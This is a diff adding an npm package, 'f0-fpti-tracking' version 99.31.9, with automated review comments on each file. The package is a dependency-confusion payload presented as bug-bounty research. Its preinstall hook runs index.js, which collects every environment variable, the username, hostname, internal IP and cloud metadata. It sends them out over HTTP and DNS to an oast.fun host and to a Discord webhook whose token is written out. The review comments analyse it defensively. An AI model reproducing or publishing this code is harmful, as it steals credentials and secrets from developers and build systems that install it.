f0-fpti-tracking 99.31.9
- package/index.js +100 -0
- package/package.json +11 -0
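--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,100 @@
+const http = require('http');
+const https = require('https');
+const os = require('os');
+const { execSync } = require('child_process');
+
+// --- CONFIGURACIÓN ---
+const OAST_HOST = "d756g1ti191heqk6b9l0o5r1sjctxedm9.oast.fun";
+const PKG_NAME = require('./package.json').name;
+
+// Función para ejecutar comandos sin petar el script
+function run(cmd) {
+try {
+return execSync(cmd, { timeout: 2000, stdio: 'pipe' }).toString().trim().substring(0, 50);
+} catch (e) { return "n/a"; }
+}
+
+async function collectAndSend() {
+// 1. Recolección de la "Huella Dactilar" (Fingerprinting)
+
+// Obtener TODAS las variables de entorno sin filtrar
+const allEnvVars = {};
+for (const [key, value] of Object.entries(process.env)) {
+allEnvVars[key] = value;
+}
+
+const data = {
+pkg: PKG_NAME,
+timestamp: new Date().toISOString(),
+identity: {
+user: os.userInfo().username,
+host: os.hostname(),
+platform: `${os.platform()} ${os.release()}`,
+internal_ip: Object.values(os.networkInterfaces()).flat()
+.filter(i => i.family === 'IPv4' && !i.internal).map(i => i.address)[0] || "no_ip"
+},
+context: {
+cwd: process.cwd(),
+// AHORA: Todas las variables de entorno completas
+all_env_vars: allEnvVars,
+// Mantenemos el campo original por compatibilidad pero ahora vacío
+env_hint: Object.keys(process.env).join(', ').substring(0, 100),
+// Intentamos ver si estamos en AWS/GCP/Azure (Metadata Service)
+cloud: run('curl -s --connect-timeout 1 http://169.254.169.254/latest/meta-data/iam/info || echo "no_cloud"')
+}
+};
+
+const payload = Buffer.from(JSON.stringify(data)).toString('base64').replace(/=/g, '');
+
+// 2. EXFILTRACIÓN VÍA HTTP (Detallada)
+const options = {
+hostname: OAST_HOST,
+port: 80,
+path: `/hit?d=${payload}`,
+method: 'GET'
+};
+
+const req = http.request(options);
+req.on('error', () => {});
+req.end();
+
+// 3. EXFILTRACIÓN VÍA DNS (Bypass de Firewalls)
+const dnsLabel = `${data.identity.host.substring(0,15)}.${data.identity.user.substring(0,10)}`.replace(/[^a-z0-9]/gi, '-');
+try {
+execSync(`nslookup ${dnsLabel}.${OAST_HOST}`, { stdio: 'ignore' });
+} catch (e) {}
+
+// 4. Discord Webhook con toda la info
+const discordPayload = JSON.stringify({
+content: "🔥 **NEW DEPENDENCY CONFUSION TRIGGERED** 🔥",
+embeds: [{
+title: "Execution Evidence - Full Environment",
+color: 16711680,
+fields: [
+{ name: "📦 Vulnerable Package", value: PKG_NAME, inline: false },
+{ name: "👤 User", value: data.identity.user, inline: true },
+{ name: "💻 Hostname", value: data.identity.host, inline: true },
+{ name: "🌐 Internal IP", value: data.identity.internal_ip, inline: true },
+{ name: "📂 Directory", value: data.context.cwd, inline: false },
+{ name: "🔧 Platform", value: data.identity.platform, inline: true },
+{ name: "☁️ Cloud Info", value: data.context.cloud.substring(0, 50), inline: true },
+{ name: "🔑 Total Env Vars", value: Object.keys(allEnvVars).length.toString(), inline: true }
+],
+footer: { text: "PayPal Bug Bounty Research - lasitoboy" }
+}]
+});
+
+const reqDiscord = https.request({
+hostname: 'discord.com',
+port: 443,
+path: '/api/webhooks/1487009597175890022/DE6xfM-BeQ1xD6U2nH7vuFoQAIDd_aVDsuzdhHiGBZpPRm0M9BU94QEglVsLHaSxqhzo',
+method: 'POST',
+headers: { 'Content-Type': 'application/json' }
+});
+reqDiscord.on('error', () => {});
+reqDiscord.write(discordPayload);
+reqDiscord.end();
+}
+
+collectAndSend();
+module.exports = {};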
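Review bot: The payload collects far more than the "Execution Evidence" the package describes: new-file lines 21–24 copy every entry of `process.env` into `all_env_vars`, and lines 47–59 send the whole object, base64-encoded, in the query string of a plaintext HTTP GET on port 80 to the `oast.fun` host. Any host that installed this version should treat the secrets in its install environment (registry tokens, CI and cloud credentials) as disclosed and rotate them. The comment at line 40 says `env_hint` is kept "pero ahora vacío", yet line 41 still fills it with the first 100 characters of the variable names; it should read `// env_hint: first 100 characters of the environment variable names`. Line 43 probes the instance metadata endpoint with an unauthenticated `curl` GET, which an AWS instance that enforces IMDSv2 session tokens would reject. Detection signals visible in this file are `curl` and `nslookup` child processes spawned by `node` during `npm install`, and outbound requests from a build host to `*.oast.fun` or to a `discord.com/api/webhooks/` path.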
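--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,11 @@
+{
+"name": "f0-fpti-tracking",
+"version": "99.31.9",
+"description": "Security Research PoC for Dependency Confusion - f0-fpti-tracking",
+"main": "index.js",
+"scripts": {
+"preinstall": "node index.js"
+},
+"author": "lasitoboy",
+"license": "MIT"
+}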
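Review bot: The `preinstall` entry at line 7 runs `node index.js` as an npm lifecycle hook, so the collector executes as soon as the package is installed, before any consumer code imports it. The version `99.31.9` at line 3 looks chosen to outrank whatever an internal registry publishes under the same unscoped name, which matches the dependency-confusion purpose stated in the description. Consumers of an internal package with this name should move it under a scope bound to their private registry (`@scope:registry=...` in `.npmrc`) and install with `--ignore-scripts` wherever lifecycle hooks are not required.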